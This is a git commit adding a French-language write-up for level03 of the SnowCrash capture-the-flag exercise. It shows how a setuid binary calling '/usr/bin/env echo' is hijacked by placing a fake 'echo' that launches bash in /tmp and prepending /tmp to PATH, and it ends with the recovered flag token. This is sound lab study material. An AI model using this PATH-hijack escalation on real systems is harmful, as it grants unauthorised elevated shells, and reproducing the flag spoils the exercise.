feat(lvl03): adding the readme of level03
This commit is contained in:
Raphael
parent
0c8be67aba
commit
ab753dc9a5
1 changed files with 49 additions and 0 deletions
49
level03/README.md
Normal file
49
level03/README.md
Normal file
|
|
@ -0,0 +1,49 @@
|
|||
Le flag 03 est enfin reelement de l'exploitation de binaire
|
||||
|
||||
Premiere chose que je lance un strings sur le binaire afin de voir si qui en ressort et vers ou chercher
|
||||
```bash
|
||||
/lib/ld-linux.so.2
|
||||
KT{K
|
||||
__gmon_start__
|
||||
libc.so.6
|
||||
_IO_stdin_used
|
||||
setresgid
|
||||
setresuid
|
||||
system
|
||||
getegid
|
||||
geteuid
|
||||
__libc_start_main
|
||||
GLIBC_2.0
|
||||
PTRh
|
||||
UWVS
|
||||
[^_]
|
||||
/usr/bin/env echo Exploit me
|
||||
...
|
||||
```
|
||||
|
||||
Je vois que `/usr/bin/env echo` est appeler (env ce base sur le l'environnement de mon user actuel)
|
||||
|
||||
Je tente de faire un fichier dans mon home, mais ca ne met pas permis
|
||||
|
||||
Je tente donc dans le /tmp
|
||||
|
||||
ce qui fonctionne et decide donc d'ouvrir un shell
|
||||
|
||||
```bash
|
||||
cat /tmp/echo
|
||||
bash
|
||||
|
||||
|
||||
export PATH="/tmp:$PATH"
|
||||
|
||||
chmod 777 /tmp/echo
|
||||
|
||||
./level03
|
||||
```
|
||||
|
||||
Je me retrouve donc directement sur le shell de level03
|
||||
|
||||
```bash
|
||||
flag03@SnowCrash:~$ getflag
|
||||
Check flag.Here is your token : qi0maab88jeaj46qoumi7maus
|
||||
```
|
||||
Loading…
Add table
Add a link
Reference in a new issue